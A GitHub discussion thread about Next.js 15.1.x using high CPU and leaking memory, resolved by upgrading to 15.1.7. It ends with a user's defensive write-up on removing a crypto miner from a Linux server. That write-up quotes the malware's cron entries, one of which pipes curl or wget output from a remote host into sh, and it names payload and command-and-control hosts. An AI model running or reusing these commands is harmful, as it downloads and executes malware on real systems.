### DISCUSSION TITLE
Next.js ^15.1.0 consuming high CPU

### DISCUSSION THREAD

**Discussion by yandodov** [vercel/next.js#74129] [Help] [answered]
### Summary

Once we upgraded to Next 15.1.0, we started experiencing weird CPU usage peaks at times of low request counts:

<img width="1787" alt="Screenshot 2024-12-19 at 10 37 54" src="https://github.com/user-attachments/assets/f9466c61-e95c-404a-afb3-bd6d4d7cb5b6" />

The above is our CPU usage vs request count for the last 2 weeks. Here's one for the last 3 hours, captured just now:

<img width="448" alt="Screenshot 2024-12-19 at 10 45 10" src="https://github.com/user-attachments/assets/04642b5e-dd85-4964-b925-c7f71806926a" />

As you can see, request counts stay fairly stable, while CPU usage explodes…

**Edit:** Here's another screenshot — traffic stays the same, yet CPU usage drops significantly:

<img width="1792" alt="Screenshot 2024-12-19 at 16 12 25" src="https://github.com/user-attachments/assets/b898bc00-cdb4-4e1a-a797-e7b47a428116" />

This has probably happened because the servers stopped getting overwhelmed with requests, as the response times had become near-instant — from ~0.80s to ~0.03s. Such response times only happen for cached content. Therefore, I think that something's wrong with the cache.

Does anyone experience something similar?

Related discussion: https://github.com/vercel/next.js/pull/73908

### Additional information

```
Operating System:
  Platform: darwin
  Arch: x64
  Version: Darwin Kernel Version 23.6.0: Fri Nov 15 15:13:28 PST 2024; root:xnu-10063.141.1.702.7~1/RELEASE_X86_64
  Available memory (MB): 32768
  Available CPU cores: 16
Binaries:
  Node: 20.17.0
  npm: 10.8.2
  Yarn: N/A
  pnpm: 9.15.0
Relevant Packages:
  next: 15.1.1 // Latest available version is detected (15.1.1).
  eslint-config-next: 15.1.1
  react: 19.0.0
  react-dom: 19.0.0
  typescript: 5.7.2
Next.js Config:
  output: standalone
```

**Comment by yandodov** [comment]
@leerob do you think that [the `v15.1.0` release](https://github.com/vercel/next.js/releases/tag/v15.1.0) could contain some regression?

We heavily rely on the ISR cache to reduce server load, so my guess is that an increase in CPU usage could be due to some issue regarding the cache. This makes me suspicious of the following PRs that are part of the 15.1.0 release:

- https://github.com/vercel/next.js/pull/72841
- https://github.com/vercel/next.js/pull/73434
- https://github.com/vercel/next.js/pull/73486
- https://github.com/vercel/next.js/pull/73530

@acdlite @ijjk since you collaborated on those PRs, can you think of a reason why this happens?

@reh2ur has also noticed a similar issue since his upgrade to 15.1.0, as he has said here: https://github.com/vercel/next.js/pull/73908#issuecomment-2551346395

**Comment by havran** [comment]
We have similar problem.

NextJS 15.1.4

![Screenshot 2025-01-16 113657](https://github.com/user-attachments/assets/70a0c285-b576-4eb5-9437-8289a6dd99d2)


For some reason CPU usage and CPU throttling on container go up in time.

**Comment by huozhi** [comment]
We have a [fix](https://github.com/vercel/next.js/pull/75041) in v15.1.6 that potentially can help reduce memory leak issue. Could you upgrade to v15.1.6 to see if memory usage goes down in monitoring? Thanks 🙏

**Reply by havran** [reply]
Thank you. We test with latest 15.2 canary and this solve memory leak problem for us. When we test 15.1.16 I return and inform you.

**Reply by havran** [reply]
Seems like all ok now, thanks again!

**Reply by yandodov** [reply]
@huozhi thanks a lot for the fix, but it appears that that's not it (at least in my case). I upgraded to 15.1.6 and observed pretty much the same thing:

<img width="1792" alt="image" src="https://github.com/user-attachments/assets/2668d8d2-3beb-4174-88ed-951e2173fe8c" />

I think the problem it can be seen most clearly on the response time chart — it's obvious that after the upgrade, there are more frequent and more drastic peaks in response time.

It's even more obvious on our environment health chart:

<img width="413" alt="image" src="https://github.com/user-attachments/assets/9e79e70f-aca8-44aa-a0d2-8f6948091889" />

Last time our auto-scaling would constantly trigger, due to the load peaks, and now it's the same.

@huozhi can you think of anything else that may be causing the issue? I deployed only the Next version bump, so this is 100% caused by Next. I'll unmark the answer, since this still appears to be an issue. 😔

**P.S.** @huozhi could you reopen this? I unmarked the answer, but the status is still "Closed."

**Reply by havran** [reply]
Unfortunatelly I must confirm same behaviour as on my previous image - only leak is slower this time (then is start to be visible after few days).

**Reply by reh2ur** [reply]
We observe the same thing, unfortunately. Memory leak with 15.1., not being fixed with 15.1.6.

**Reply by yandodov** [reply]
@huozhi could we turn this from a discussion to an issue? Multiple people are experiencing and it's apparently an actual issue/bug, not just a problem with a specific person's setup.

**Reply by hamidrezahanafi** [reply]
Same here, the issue still there with high CPU usage, can we reopen this issue?

**Reply by 2803media** [reply]
I just upgrade to 15.1.7 from 15.1.6 and the CPU usage look like more normal (with node 20.18.2)

**Reply by huozhi** [reply, marked as answer]
We landed a [patch](https://github.com/vercel/next.js/pull/75727) in https://github.com/vercel/next.js/releases/tag/v15.1.7 related to memory leak. Please upgrade and let us know if that fixes your issue. Thanks 🙏

**Reply by yandodov** [reply]
Yep, Node 22.14 with Next 15.1.7 does it for me. Thank you, @huozhi!

**Comment by bloodykheeng** [comment]
---
## ✅ i had the same problem to on my linode vps where i find cpu usage very high in the midnight but i discovered there was milicious executable running  and using high cpu usage i saw it through htop and it reulted to be a crypto miner

## ✅ How I Removed a Malicious Crypto Miner on My Linux Server

I recently discovered that my Linux system was compromised by a malicious cryptocurrency mining script. Here's how I diagnosed and resolved the issue:

---

### 🔎 Step 1: Spotted High CPU Usage with `htop`

I noticed my server was unusually slow, so I opened `htop` to check system resource usage:

```bash
htop
```

There I saw suspicious processes using a lot of CPU. I noted the PID (in my case `242116`) and terminated it:

```bash
kill -9 242116
```

---

### 🧪 Step 2: Investigated Cron Jobs

To check for persistent malware, I listed all cron jobs:

```bash
ls -la /etc/cron*
```

I found two suspicious files:

```
-rw-r--r-- 1 root root 120 May 15 00:00 mdadm
```

---

### 📂 Step 3: Inspected the Contents

I checked both files to see what they were doing:

```bash
cat /etc/cron.d/reboot
```

```cron
@reboot root sleep 60 && cd /root/.local/share && ./vyatta
```

```bash
cat /etc/cron.d/mdadm
```

```cron
0 0 * * * root sh -c "(curl -sk https://fulminare.top || wget --no-check-certificate -qO - https://fulminare.top) | sh"
```

It was clear `mdadm` was downloading and executing a script from a remote server every night.

---

### 🔍 Step 4: Analyzed the Malicious Script

I wanted to see what was being downloaded, so I created a safe test directory:

```bash
mkdir /root/test && cd /root/test
curl -sk https://fulminare.top -o malicious_script.txt
nano malicious_script.txt
```

Upon inspection, the script was indeed malicious.

---

### ☠️ What the Script Was Doing

* **Generated random filenames** to disguise itself.
* **Killed CPU-intensive processes** (to make way for crypto mining).
* **Downloaded payloads** based on system architecture from `http://77.110.110.55`:

  * `x86_64`: `/1`
  * `aarch64`: `/2`
  * `amd64`: `/3` (saved as `support`)
* **Established persistence** via:

  * Cron jobs (`/etc/cron.d`)
  * Udev rules (`/etc/udev/rules.d`)
* **Attempted privilege escalation**
* **Cleared logs and bash history** to hide traces
* **Communicated with external IPs**, including `loop.anondns.net`

---

### 🧹 Step 5: Removed the Malware

I deleted the malicious cron jobs:

```bash
rm -f /etc/cron.d/mdadm
```

I also checked and removed malicious udev rules:

```bash
rm -f /etc/udev/rules.d/mdadm
```
---
